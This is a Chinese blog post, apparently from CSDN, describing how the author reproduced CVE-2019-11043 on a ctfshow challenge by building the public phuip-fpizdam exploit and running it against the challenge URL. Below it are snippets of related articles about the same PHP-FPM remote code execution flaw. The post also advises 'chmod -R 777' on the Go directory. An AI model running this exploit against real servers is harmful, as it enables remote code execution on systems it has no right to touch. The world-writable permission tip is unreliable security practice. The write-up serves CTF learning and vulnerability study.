CVE-2019-11043 复现ctfshow

最新推荐文章于 2024-05-23 18:33:01 发布
最新推荐文章于 2024-05-23 18:33:01 发布
阅读量172 收藏
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/giaogiao123/article/details/116234714
版权

首先确定是cve 2019-11043
从网上找资料来打,yu师傅的博客
https://blog.csdn.net/miuzzx/article/details/111409718?spm=1001.2014.3001.5501
还有https://paper.seebug.org/1063/
加上自己的遇到的一些问题
首先我们先安装go环境,文件太大你是拖不进去kali的,尝试使用xshell和xfpt
失败
从网上了解到,xshell无法直接连接kali 的 root权限 需要先改一下文件配置
参考这篇文章https://blog.csdn.net/qq_41877184/article/details/89737079
解决完以后从https://golang.google.cn/dl/ 下载go环境用xshell连接到kali
这个命令来解决
如果出现没有权限的情况,到go目录下打开终端尝试这个命令

sudo chmod -R 777 go/

之后go环境就装好了
在这里插入图片描述
下载github上公开的exp(需要go环境)

go get github.com/neex/phuip-fpizdam

可能会失败
在这里插入图片描述
尝试这个命令来解决

go env -w GOPROXY=https://goproxy.cn

然后编译

go install github.com/neex/phuip-fpizdam

使用exp攻击demo网站

./phuip-fpizdam http://697ad24e-bcff-4558-9795-0651afa73be8.challenge.ctf.show:8080/index.php

可能会多次失败,建议刷新页面多次请求
出现在这里插入图片描述
在这里插入图片描述
总的来说这个复现不算太难。。。。我太菜了

jing!
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2019-11043:Neex的(PoC)CVE-2019-11043 Python版本
03-08
PoC CVE-2019-11043 CVE-2019-11043漏洞利用的Python版本 此PoC仍然是草稿,请使用编写的漏洞利用漏洞分析: : PoC设定 只需运行docker compose即可启动nginx和php-fpm: # docker-compose up -d Creating network " cve-2019-11043-git_app_net " with driver " bridge " Creating php ... done Creating nginx ... done 如果您想阅读php-fpm日志,可以运行: docker logs --tail 10 --follow php 开发 # python3 exploit.py --url http://localhost/index.php [ * ] QSL candidate:
CVE-2019-11043(PHP远程代码执行漏洞)
m0_51468027的博客
02-12 8815
一、漏洞描述   CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。   向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。   该漏洞需要在nginx.conf中进行特定配置才能触发。具体配置如下: location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcgi_
CVE-2019-11043 PHP-FPM 和学习(环境CTFShow web311)
paidx0
08-09 468
CVE-2019-11043和学习 漏洞描述 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。 向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。 该漏洞需要在nginx.conf中进行特定配置才能触发。 location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcg
vulhub-php cve-2019-11043
ANYOUZHEN的博客
06-04 377
漏洞描述:Nginx上fastcgi_split_path_info在处理带有%0a的请求时,会因为遇到换行符\n导致PATH_INFO为空。而php-fpm在处理PATH_INFO为空的情况下,存在逻辑缺陷。攻击者通过精心构造和利用的PAYLOAD,可以导致远程代码执行。但Nginx使用的这个fastcgi配置,并非Nginx默认配置 受影响的版本:使用Nginx + php-fpm配置的服务器,并且在nginx/conf/nginx.confg配置文件中采用如下配置的时候,都会出RCE漏洞 fas
PHP-FPM执行任意代码CVE-2019-11043
ranuy阮的博客
10-24 3477
0x00背景 在长亭科技举办的 Real World CTF 中,国外安全研究员 Andrew Danau 在解决一道 CTF 题目时发,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。 在使用一些有错误的Nginx配置的情况下,通过恶意构造的数据包,即可让PHP-FPM执行任意代码。 0x01环境搭建 下载漏洞环境,使用docker搭建,漏洞环境地址https://gi...
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
CVE-2019-11708和CVE-2019-9810的全链漏洞利用 这是针对Windows 64位Firefox的完整的浏览器入侵漏洞利用链(CVE-2019-11708和CVE-2019-9810)。 它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-...
cve-2019-11477.rar
06-20
此漏洞只支持本地检测,不支持远程检测模式,检测成功率很高,可以排查网络资产中是否存在此问题,避免此漏洞造成的DoS 问题
eclipse jetty插件
05-16
run-jetty-run是一个新的jetty eclipse插件通过该插件可以直接在Eclipse环境中启动、停止 Jetty ,同时进行在线调试而无需重启服务。 http://run-jetty-run.googlecode.com/svn/trunk/updatesite 由于谷歌退出中国,导致在线安装失败,只能离线安装,特此提供。
CVE-2019-11043(PHP远程代码执行漏洞)
永远是少年
12-11 1993
今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2019-11043(PHP远程代码执行漏洞)。 一、CVE-2019-11043(PHP远程代码执行漏洞)简介 二、CVE-2019-11043(PHP远程代码执行漏洞)漏洞环境搭建 三、CVE-2019-11043(PHP远程代码执行漏洞)漏洞利用工具安装 四、CVE-2019-11043(PHP远程代码执行漏洞)
PHP-fpm远程代码执行漏洞(CVE-2019-11043)
老北京砸酱锤的博客
06-22 960
漏洞介绍 Nginx 上 fastcgi_split_path_info 在处理带有 %0a 的请求时,会因为遇到换行符 \n 导致 PATH_INFO 为空。而 php-fpm 在处理 PATH_INFO 为空的情况下,存在逻辑缺陷。攻击者通过精心的构造和利用,可以导致远程代码执行。 Nginx+php-fpm的服务器,在使用如下配置的时候,可能存在远程代码执行漏洞。 漏洞 使用vulhub漏洞,进入CVE-2019-11043文件夹下(cd /home/apple/vulhub/ph
cve-2019-11043(靶机为Ubuntu18.04,php编译安装)
ckm1607011的博客
02-29 868
最近做的项目需要nginx的exp,其中就包括cve-2019-11043这个exp,他是一个远程代码执行的exp; 这个cve的来源:GitHub - neex/phuip-fpizdam: Exploit for CVE-2019-11043 我看了之后在Kali上把源码编译了,大家注意编译需要1.13以上版本的go,编译出来的可执行文件在linux平台上就都可以执行了; 让我感到...
CVE-2019-11043
hhiollk的博客
03-31 541
01 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。 漏洞环境: 先把exp克隆到本地。 gitclonehttps://github.com/neex/phuip-fpizdam.git 安装go环境 wget -c h...
PHP远程代码执行漏洞CVE-2019-11043分析
五侠的博客
05-24 757
PHP远程代码执行漏洞CVE-2019-11043分析 CVE-2019-11043是一种2019年出的PHP远程代码执行漏洞 Nginx上fastcgi_split_path_info在处理带有 %0a 的请求时,会因为遇到换行符 \n 导致PATH_INFO为空,最终可导致任意代码执行。 利用条件 PHP版本7及fastcgi协议 PHP7以上,使用fpm形式处理请求,需要使用fastcgi协议,并且利用nginx的正则实pathinfo和filename分离,例如:inidex.php/artic
CVE-2019-11043 PHP远程代码执行
qq_46804551的博客
02-05 177
CVE-2019-11043 PHP远程代码执行 该漏洞是某比赛解决一道CTF题目时发,向目标服务器URL发送%0a符号时,服务返回异常发的漏洞 2019年9月26日,PHP官方发布漏洞通告,其中指出,使用Nginx+php-fpm的服务器,在部分配置下,存在远程代码执行漏洞,且该配置已被广泛使用,危害较大,影响较为广泛。 漏洞环境: git clone https://github.com/vulhub/vulhub.git cd vulhub/php/CVE-2019-11043
php漏洞cve,「漏洞通告」PHP远程代码执行漏洞(CVE-2019-11043)
weixin_29808375的博客
03-09 1499
1.综述2019年9月14日至18举办的 Real World CTF中,国外安全研究员 Andrew Danau 在解决一道CTF题目时发,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。2019年9月26日,PHP官方发布漏洞通告,其中指出:使用 Nginx + php-fpm的服务器,在部分配置下,存在远程代码执行漏洞.且该配置已被广泛使用,危害较大,影响较为广泛。...
【漏洞CVE-2019-11043(PHP远程代码执行漏洞)信息安全论文_含漏洞完整过程_含Linux环境go语言编译环境安装
最新发布
Thmos_vader的博客
05-23 1137
CVE-2019-11043漏洞是PHP的一个远程代码执行漏洞,该漏洞产生与Nginx利用fastcgi_split_path_info在处理带有 %0a 的请求时,会因为遇到换行符(%0a)导致PATH_INFO为空,最终可导致任意代码执行。 该漏洞普遍出在Nginx+php-fpm环境中,且PHP版本在7.0-7.3之间。
CVE-2019-11477 漏洞教程
05-27
我很抱歉,由于 CVE-2019-11477 是一种漏洞,攻击该漏洞可能导致远程服务器拒绝服务或崩溃,因此我无法提供该漏洞的教程或攻击代码。在任何情况下,攻击漏洞是违法行为,违反了信息安全法律法规,也会对网络安全...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值